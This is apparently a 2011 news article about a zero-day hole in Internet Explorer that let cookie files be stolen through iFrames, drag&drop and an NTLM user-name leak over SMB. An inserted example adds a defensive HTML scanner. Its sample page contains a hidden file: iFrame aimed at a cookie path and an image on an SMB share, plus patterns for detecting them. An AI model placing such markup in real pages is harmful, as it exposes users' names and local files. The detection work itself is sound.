In association with heise online

26 May 2011, 14:43

Internet Explorer: cookie theft made easy


Security researcher Rosario Valotta has discovered a zero-day hole in all versions of Internet Explorer that allows arbitrary cookies to be stolen on the net. Internet Explorer's security zone mechanism normally prevents sites in the internet zone from embedding local zone content, for instance files from the user's hard disk, into iFrames. The researcher discovered, however, that cookie files appear to be exempt from this restriction and can be loaded into an iFrame. The cookie's contents are then rendered as invisible text, and the user is tricked into moving them from the iFrame into the main window via drag&drop. To keep users from noticing what is happening, Valotta packaged the whole thing in a game.

This is not a trivial attack: apart from having to solicit a user's co-operation so that the data can be extracted via drag&drop – something Valotta solved using a simple puzzle game in his demo video – a potential attacker must also know the exact path of the cookie. As that path contains the victim's Windows user name, the attacker needs to find this out beforehand.

Valotta solves this problem by embedding an image that is stored on a shared SMB network volume into the malicious web site. However, server access requires NTLM authentication. To authenticate, the computer sends the current user's user name in plain text, which the attacker can simply intercept using a packet sniffer. To complete the path, the attacker must also find out the victim's operating system version; this can be achieved, for example, by evaluating the navigator.userAgent JavaScript object. Compared to a passive attack via Firesheep, Valotta's approach is, therefore, considerably more involved.
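The two ingredients the article describes, an image fetched from an SMB share (which triggers the NTLM exchange that leaks the user name) and an iFrame pointed at a local file path, are both things an internet-zone page has no legitimate reason to reference. The following scanner, an added example that is not part of the article or of Valotta's demo, shows the check a web proxy, mail filter or page-analysis pipeline can run: it parses HTML and flags resource-loading tags whose source is a UNC path, a file: URL or a bare drive path. The sample page, the documentation-range IP address and the cookie path in it are constructed for the example; the real cookie location on the victim's system is not taken from the article.

```python
"""Defender-side check: flag HTML that points resource-loading tags at
UNC shares, file: URLs or local drive paths. Added example, not code from
the article or from the researcher's demo. The sample page below is
constructed; the cookie path in it is a placeholder, not a real location."""
from html.parser import HTMLParser
import re

# Tags and attributes whose value the browser fetches automatically, so a
# reference here is acted on without any user interaction.
RESOURCE_ATTRS = {
    "img": ("src",),
    "iframe": ("src",),
    "frame": ("src",),
    "object": ("data",),
    "embed": ("src",),
    "script": ("src",),
    "link": ("href",),
}

# References that leave the web zone. Protocol-relative URLs ("//cdn/...")
# are deliberately NOT matched: they resolve to http(s) and are legitimate.
SUSPICIOUS = [
    ("unc-path", re.compile(r"^\s*\\\\[^\\/]+\\", re.I)),   # \\host\share\...
    ("file-url", re.compile(r"^\s*file:", re.I)),           # file:///C:/...
    ("drive-path", re.compile(r"^\s*[a-z]:[\\/]", re.I)),   # C:\... or C:/...
]


def classify(url):
    """Return the reason a reference is suspicious, or None if it is not."""
    for reason, pattern in SUSPICIOUS:
        if pattern.search(url):
            return reason
    return None


class ResourceRefScanner(HTMLParser):
    """Collects (tag, attribute, value, reason) for every flagged reference."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        wanted = RESOURCE_ATTRS.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name in wanted and value is not None:
                reason = classify(value)
                if reason:
                    self.findings.append((tag, name, value, reason))


def scan_html(html):
    """Parse a page and return the list of flagged resource references."""
    scanner = ResourceRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one benign image, one protocol-relative script,
# one image on an SMB share and one iFrame pointing at a local file path.
SAMPLE_PAGE = """<html><body>
<h1>Puzzle</h1>
<img src="https://cdn.example.test/tile.png">
<img src="\\\\203.0.113.10\\share\\pixel.gif" width="1" height="1">
<iframe src="file:///C:/Users/PLACEHOLDER_USER/cookies/example.txt" style="opacity:0"></iframe>
<script src="//cdn.example.test/app.js"></script>
</body></html>"""


if __name__ == "__main__":
    for tag, attr, value, reason in scan_html(SAMPLE_PAGE):
        print(f"{reason:10s} <{tag} {attr}=\"{value}\">")
```

The scanner flags the SMB-hosted image and the local-path iFrame while leaving the https and protocol-relative references alone; on a real feed the flagged entries are what an analyst would review, since an internet page that reaches for a share or a local file is exhibiting exactly the behaviour the article describes.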

Talking to Reuters, Valotta said that he harvested more than 80 cookies from his 150 Facebook friends within three days. The researcher notified the Microsoft Security Response Center of the original hole on 28 January 2011, and Microsoft solved the problem before the final version of IE9 was released on 18 March. However, only two weeks later, Valotta found a slightly modified approach that also allowed him to steal cookies from IE9 users, which he demonstrated (direct download PowerPoint file) at the Hack In The Box conference in Amsterdam.
